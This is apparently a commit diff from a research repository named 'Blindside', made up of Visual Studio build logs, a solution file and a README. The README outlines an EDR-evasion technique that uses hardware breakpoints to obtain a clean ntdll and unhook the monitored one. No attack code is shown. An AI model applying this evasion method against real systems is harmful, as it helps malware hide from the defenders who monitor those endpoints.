     249 +C:\PROGRAM FILES\MICROSOFT VISUAL STUDIO\2022\COMMUNITY\VC\TOOLS\MSVC\14.32.31326\INCLUDE\__MSVC_XLOCINFO_TYPES.HPP
     250 +C:\PROGRAM FILES\MICROSOFT VISUAL STUDIO\2022\COMMUNITY\VC\TOOLS\MSVC\14.32.31326\INCLUDE\CCTYPE
     251 +C:\PROGRAM FILES\MICROSOFT VISUAL STUDIO\2022\COMMUNITY\VC\TOOLS\MSVC\14.32.31326\INCLUDE\CLOCALE
     252 +C:\PROGRAM FILES (X86)\WINDOWS KITS\10\INCLUDE\10.0.19041.0\UCRT\LOCALE.H
     253 +C:\PROGRAM FILES\MICROSOFT VISUAL STUDIO\2022\COMMUNITY\VC\TOOLS\MSVC\14.32.31326\INCLUDE\SSTREAM
     254 +C:\PROGRAM FILES\MICROSOFT VISUAL STUDIO\2022\COMMUNITY\VC\TOOLS\MSVC\14.32.31326\INCLUDE\STRING
     255 +C:\PROGRAM FILES\MICROSOFT VISUAL STUDIO\2022\COMMUNITY\VC\TOOLS\MSVC\14.32.31326\INCLUDE\UNORDERED_MAP
     256 +C:\PROGRAM FILES\MICROSOFT VISUAL STUDIO\2022\COMMUNITY\VC\TOOLS\MSVC\14.32.31326\INCLUDE\XHASH
     257 +C:\PROGRAM FILES\MICROSOFT VISUAL STUDIO\2022\COMMUNITY\VC\TOOLS\MSVC\14.32.31326\INCLUDE\LIST
     258 +C:\PROGRAM FILES\MICROSOFT VISUAL STUDIO\2022\COMMUNITY\VC\TOOLS\MSVC\14.32.31326\INCLUDE\VECTOR
     259 +C:\PROGRAM FILES\MICROSOFT VISUAL STUDIO\2022\COMMUNITY\VC\TOOLS\MSVC\14.32.31326\INCLUDE\XBIT_OPS.H
     260 +C:\PROGRAM FILES\MICROSOFT VISUAL STUDIO\2022\COMMUNITY\VC\TOOLS\MSVC\14.32.31326\INCLUDE\XNODE_HANDLE.H
     261 +C:\USERS\ILANKA.CYMRESEARCH\SOURCE\REPOS\BLINDSIDE\BLINDSIDE\HELPERS.H
     262 +C:\PROGRAM FILES\MICROSOFT VISUAL STUDIO\2022\COMMUNITY\VC\TOOLS\MSVC\14.32.31326\INCLUDE\FUNCTIONAL
     263 +C:\USERS\ILANKA.CYMRESEARCH\SOURCE\REPOS\BLINDSIDE\BLINDSIDE\STEALTH.H
     264 + 
  • ■ ■ ■ ■ ■ ■
    Blindside/x64/Release/Blindside.tlog/CL.write.1.tlog
     1 +^C:\USERS\ILANKA.CYMRESEARCH\SOURCE\REPOS\BLINDSIDE\BLINDSIDE\BLINDSIDE.CPP
     2 +C:\USERS\ILANKA.CYMRESEARCH\SOURCE\REPOS\BLINDSIDE\BLINDSIDE\X64\RELEASE\VC143.PDB
     3 +C:\USERS\ILANKA.CYMRESEARCH\SOURCE\REPOS\BLINDSIDE\BLINDSIDE\X64\RELEASE\BLINDSIDE.OBJ
     4 + 
  • ■ ■ ■ ■ ■ ■
    Blindside/x64/Release/Blindside.tlog/link.command.1.tlog
     1 +^C:\USERS\ILANKA.CYMRESEARCH\SOURCE\REPOS\BLINDSIDE\BLINDSIDE\X64\RELEASE\BLINDSIDE.OBJ
     2 +/OUT:"C:\USERS\ILANKA.CYMRESEARCH\SOURCE\REPOS\BLINDSIDE\X64\RELEASE\BLINDSIDE.EXE" /NOLOGO KERNEL32.LIB USER32.LIB GDI32.LIB WINSPOOL.LIB COMDLG32.LIB ADVAPI32.LIB SHELL32.LIB OLE32.LIB OLEAUT32.LIB UUID.LIB ODBC32.LIB ODBCCP32.LIB /MANIFEST /MANIFESTUAC:"level='asInvoker' uiAccess='false'" /manifest:embed /DEBUG /PDB:"C:\USERS\ILANKA.CYMRESEARCH\SOURCE\REPOS\BLINDSIDE\X64\RELEASE\BLINDSIDE.PDB" /SUBSYSTEM:CONSOLE /OPT:REF /OPT:ICF /LTCG:incremental /LTCGOUT:"X64\RELEASE\BLINDSIDE.IOBJ" /TLBID:1 /DYNAMICBASE /NXCOMPAT /IMPLIB:"C:\USERS\ILANKA.CYMRESEARCH\SOURCE\REPOS\BLINDSIDE\X64\RELEASE\BLINDSIDE.LIB" /MACHINE:X64 X64\RELEASE\BLINDSIDE.OBJ
     3 + 
  • ■ ■ ■ ■ ■ ■
    Blindside/x64/Release/Blindside.tlog/link.read.1.tlog
     1 +^C:\USERS\ILANKA.CYMRESEARCH\SOURCE\REPOS\BLINDSIDE\BLINDSIDE\X64\RELEASE\BLINDSIDE.OBJ
     2 +C:\PROGRAM FILES (X86)\WINDOWS KITS\10\LIB\10.0.19041.0\UM\X64\KERNEL32.LIB
     3 +C:\PROGRAM FILES (X86)\WINDOWS KITS\10\LIB\10.0.19041.0\UM\X64\USER32.LIB
     4 +C:\PROGRAM FILES (X86)\WINDOWS KITS\10\LIB\10.0.19041.0\UM\X64\GDI32.LIB
     5 +C:\PROGRAM FILES (X86)\WINDOWS KITS\10\LIB\10.0.19041.0\UM\X64\WINSPOOL.LIB
     6 +C:\PROGRAM FILES (X86)\WINDOWS KITS\10\LIB\10.0.19041.0\UM\X64\COMDLG32.LIB
     7 +C:\PROGRAM FILES (X86)\WINDOWS KITS\10\LIB\10.0.19041.0\UM\X64\ADVAPI32.LIB
     8 +C:\PROGRAM FILES (X86)\WINDOWS KITS\10\LIB\10.0.19041.0\UM\X64\SHELL32.LIB
     9 +C:\PROGRAM FILES (X86)\WINDOWS KITS\10\LIB\10.0.19041.0\UM\X64\OLE32.LIB
     10 +C:\PROGRAM FILES (X86)\WINDOWS KITS\10\LIB\10.0.19041.0\UM\X64\OLEAUT32.LIB
     11 +C:\PROGRAM FILES (X86)\WINDOWS KITS\10\LIB\10.0.19041.0\UM\X64\UUID.LIB
     12 +C:\PROGRAM FILES (X86)\WINDOWS KITS\10\LIB\10.0.19041.0\UM\X64\ODBC32.LIB
     13 +C:\PROGRAM FILES (X86)\WINDOWS KITS\10\LIB\10.0.19041.0\UM\X64\ODBCCP32.LIB
     14 +C:\USERS\ILANKA.CYMRESEARCH\SOURCE\REPOS\BLINDSIDE\BLINDSIDE\X64\RELEASE\BLINDSIDE.OBJ
     15 +C:\WINDOWS\GLOBALIZATION\SORTING\SORTDEFAULT.NLS
     16 +C:\PROGRAM FILES\MICROSOFT VISUAL STUDIO\2022\COMMUNITY\VC\TOOLS\MSVC\14.32.31326\BIN\HOSTX64\X64\C2.DLL
     17 +C:\PROGRAM FILES\MICROSOFT VISUAL STUDIO\2022\COMMUNITY\VC\TOOLS\MSVC\14.32.31326\LIB\X64\MSVCPRT.LIB
     18 +C:\PROGRAM FILES\MICROSOFT VISUAL STUDIO\2022\COMMUNITY\VC\TOOLS\MSVC\14.32.31326\LIB\X64\MSVCRT.LIB
     19 +C:\PROGRAM FILES\MICROSOFT VISUAL STUDIO\2022\COMMUNITY\VC\TOOLS\MSVC\14.32.31326\LIB\X64\OLDNAMES.LIB
     20 +C:\PROGRAM FILES\MICROSOFT VISUAL STUDIO\2022\COMMUNITY\VC\TOOLS\MSVC\14.32.31326\LIB\X64\VCRUNTIME.LIB
     21 +C:\PROGRAM FILES (X86)\WINDOWS KITS\10\LIB\10.0.19041.0\UCRT\X64\UCRT.LIB
     22 +C:\PROGRAM FILES\MICROSOFT VISUAL STUDIO\2022\COMMUNITY\VC\TOOLS\MSVC\14.32.31326\BIN\HOSTX64\X64\1033\LINKUI.DLL
     23 +C:\USERS\ILANKA.CYMRESEARCH\SOURCE\REPOS\BLINDSIDE\BLINDSIDE\X64\RELEASE\BLINDSIDE.IPDB
     24 +C:\USERS\ILANKA.CYMRESEARCH\SOURCE\REPOS\BLINDSIDE\BLINDSIDE\X64\RELEASE\BLINDSIDE.IOBJ
     25 +C:\PROGRAM FILES\MICROSOFT VISUAL STUDIO\2022\COMMUNITY\VC\TOOLS\MSVC\14.32.31326\BIN\HOSTX64\X64\CVTRES.EXE
     26 +C:\WINDOWS\SYSTEM32\TZRES.DLL
     27 +C:\USERS\ILANKA.CYMRESEARCH\SOURCE\REPOS\BLINDSIDE\BLINDSIDE\X64\RELEASE\VC143.PDB
     28 + 
  • ■ ■ ■ ■ ■ ■
    Blindside/x64/Release/Blindside.tlog/link.write.1.tlog
     1 +^C:\USERS\ILANKA.CYMRESEARCH\SOURCE\REPOS\BLINDSIDE\BLINDSIDE\X64\RELEASE\BLINDSIDE.OBJ
     2 +C:\USERS\ILANKA.CYMRESEARCH\SOURCE\REPOS\BLINDSIDE\X64\RELEASE\BLINDSIDE.EXE
     3 +C:\USERS\ILANKA.CYMRESEARCH\SOURCE\REPOS\BLINDSIDE\BLINDSIDE\X64\RELEASE\BLINDSIDE.IPDB
     4 +C:\USERS\ILANKA.CYMRESEARCH\SOURCE\REPOS\BLINDSIDE\X64\RELEASE\BLINDSIDE.PDB
     5 +C:\USERS\ILANKA.CYMRESEARCH\SOURCE\REPOS\BLINDSIDE\BLINDSIDE\X64\RELEASE\BLINDSIDE.IOBJ
     6 + 
  • Blindside/x64/Release/vc143.pdb
    Binary file.
  • ■ ■ ■ ■ ■ ■
    Blindside.sln
     1 +
     2 +Microsoft Visual Studio Solution File, Format Version 12.00
     3 +# Visual Studio Version 17
     4 +VisualStudioVersion = 17.2.32526.322
     5 +MinimumVisualStudioVersion = 10.0.40219.1
     6 +Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "Blindside", "Blindside\Blindside.vcxproj", "{A1E8ACBA-A0B7-47DB-A3DB-4BC45348C1A3}"
     7 +EndProject
     8 +Global
     9 + GlobalSection(SolutionConfigurationPlatforms) = preSolution
     10 + Debug|x64 = Debug|x64
     11 + Debug|x86 = Debug|x86
     12 + Release|x64 = Release|x64
     13 + Release|x86 = Release|x86
     14 + EndGlobalSection
     15 + GlobalSection(ProjectConfigurationPlatforms) = postSolution
     16 + {A1E8ACBA-A0B7-47DB-A3DB-4BC45348C1A3}.Debug|x64.ActiveCfg = Debug|x64
     17 + {A1E8ACBA-A0B7-47DB-A3DB-4BC45348C1A3}.Debug|x64.Build.0 = Debug|x64
     18 + {A1E8ACBA-A0B7-47DB-A3DB-4BC45348C1A3}.Debug|x86.ActiveCfg = Debug|Win32
     19 + {A1E8ACBA-A0B7-47DB-A3DB-4BC45348C1A3}.Debug|x86.Build.0 = Debug|Win32
     20 + {A1E8ACBA-A0B7-47DB-A3DB-4BC45348C1A3}.Release|x64.ActiveCfg = Release|x64
     21 + {A1E8ACBA-A0B7-47DB-A3DB-4BC45348C1A3}.Release|x64.Build.0 = Release|x64
     22 + {A1E8ACBA-A0B7-47DB-A3DB-4BC45348C1A3}.Release|x86.ActiveCfg = Release|Win32
     23 + {A1E8ACBA-A0B7-47DB-A3DB-4BC45348C1A3}.Release|x86.Build.0 = Release|Win32
     24 + EndGlobalSection
     25 + GlobalSection(SolutionProperties) = preSolution
     26 + HideSolutionNode = FALSE
     27 + EndGlobalSection
     28 + GlobalSection(ExtensibilityGlobals) = postSolution
     29 + SolutionGuid = {19D3AF89-CC8A-4E3A-B8E9-F181023A6263}
     30 + EndGlobalSection
     31 +EndGlobal
     32 + 
  • ■ ■ ■ ■ ■
    README.md
    1  -# Blindside
    2  -Utilizing hardware breakpoints to evade monitoring by Endpoint Detection and Response platforms
     1 +Blinside
     2 +
     3 +Blindside is a technique for evading the monitoring of endpoint detection and response (EDR) and extended detection and response (XDR) platforms using hardware breakpoints to inject commands and perform unexpected, unwanted, or malicious operations. It involves creating a breakpoint handler, and setting a hardware breakpoint that will force the debugged process to load only ntdll to memory. This will result in a clean and unhooked ntdll which then could be copied to our process and unhook the original ntdll.
     4 +
     5 +![](https://cymulate.com/wp-content/uploads/2022/12/blindside-image-004.png)
    3 6  
     7 +
     8 +Please note that this technique should only be used for research and testing purposes and should not be used for any illegal or malicious activities. This repository contains the necessary code and instructions for implementing the Blindside technique.
Please wait...
Page is in error, reload to recover